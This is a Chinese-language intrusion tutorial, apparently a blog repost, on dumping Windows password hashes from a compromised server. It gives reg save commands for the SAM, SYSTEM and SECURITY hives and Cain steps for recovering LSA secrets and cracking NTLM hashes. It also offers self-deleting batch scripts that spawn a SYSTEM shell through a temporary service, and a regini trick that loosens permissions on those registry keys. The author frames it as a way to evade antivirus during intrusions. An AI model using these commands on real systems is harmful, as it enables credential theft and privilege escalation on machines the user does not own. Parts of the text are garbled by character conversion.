先看看“导出系统注册表抓Hash” 的原文,挺不错的思路。
==============
原文==============
如今登陆目标 3389后,我看好多人都已经习惯抓密码 HASH而后回来彩虹表破解出明文了,或者传个winloginhack来记录 3389的登陆密码。在我最近的几回***中,发现 pwdump,fgdump这类工具如今已经难免杀了,并且这类工具都是要注入到 lsass.exe进程的,遇到 macfee这类的杀毒软件,默认是绕不过去的 。Winlogin网上放出来的,通过个人测试,对 WIN2008是没有效果的。今天浏览 BLOG,看到老外提到另外一种抓系统密码 hash的技巧,通过实践,发现可行,分享给你们。
首先使用 administrator权限登陆,而后使用 reg来保存注册表中 HKLM下的 SECURITY,SAM,SYSTEM,注意这里必须使用 reg的 save选项,export选项是不行的,
reg save hklm\sam sam.hive
reg save hklm\system ystem.hive
reg save hklm\security security.hive
图1
而后把 sam.hive,system.hive,security.hive下载回本地,打开 CAIN,在"Decoders"标签下,点"LSA Secrets", 点"+"来导入 system.hive和 security.hive.
图2
这里通常就能看到管理员的明文密码了, 如图 3,固然这里的密码,有时候也是历史密码。若是尝试登陆不对,能够来尝试爆破 lm/ntlm hash.
图3
要破解 LM/NTLM hash,首先点"cracker"标签下的"LM&NTLM hashes",而后点"+",导入 sam.hive,注意因为如今的 win2000之后都默认使用了 syskey,因此还要导入 system.hive中的 syskey的值,而后就能够彩虹表破解了。如图 4.如图 5
图4
图5
后话:
这个方法不是对全部 WINDOWS发行版本都通用的,好比对 win 2000 sp4,win xp sp2就不行,对win2003,2008是管用的。具体工做列表以下:
Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works
============
注册表提权读取思路=================
一、如下是TheLostMind的思路
对用户权限要求,默认XP SP3是导出不了的,我本地测试了,可是system权限是能够的,那么咱能够建立一个system权限运行的CMD,而后再导出就OK了。
其余系统上面没测试过,你们本身整吧。
首先建立一个系统权限执行的CMD:
======================StartSystemCmd.bat=========
sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0
=======================END=========================
而后导出文件。
==================SaveReg.bat=======================
@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0
=====================END============================
而后倒入到CAIN里面破吧。
二、个人思路
有时咱们不方便再跳出一个CMD,这时能够利用命令regini.exe修改注册表的访问权限。
首先新建一个文本文件pri.ini,内容以下:
===========pri.ini===================
HKEY_LOCAL_MACHINE\SECURITY [1 17]
HKEY_LOCAL_MACHINE\SAM [1 17]
===================================
而后执行 regini.exe pri.ini
写成批处理的内容以下:
================================
echo HKEY_LOCAL_MACHINE\SECURITY [1 17]>pri.ini
echo HKEY_LOCAL_MACHINE\SAM [1 17]>>pri.ini
regini.exe pri.ini
del pri.ini
================================
注:以上操做是将hklm\security与hklm\sam赋予Administrators和System彻底访问的权限。hklm\system通常对管理员是放开访问的,可视状况修改。以上两个表项对系统登录相当重要,请谨慎修改。
最后就能够直接利用reg导出注册表内容。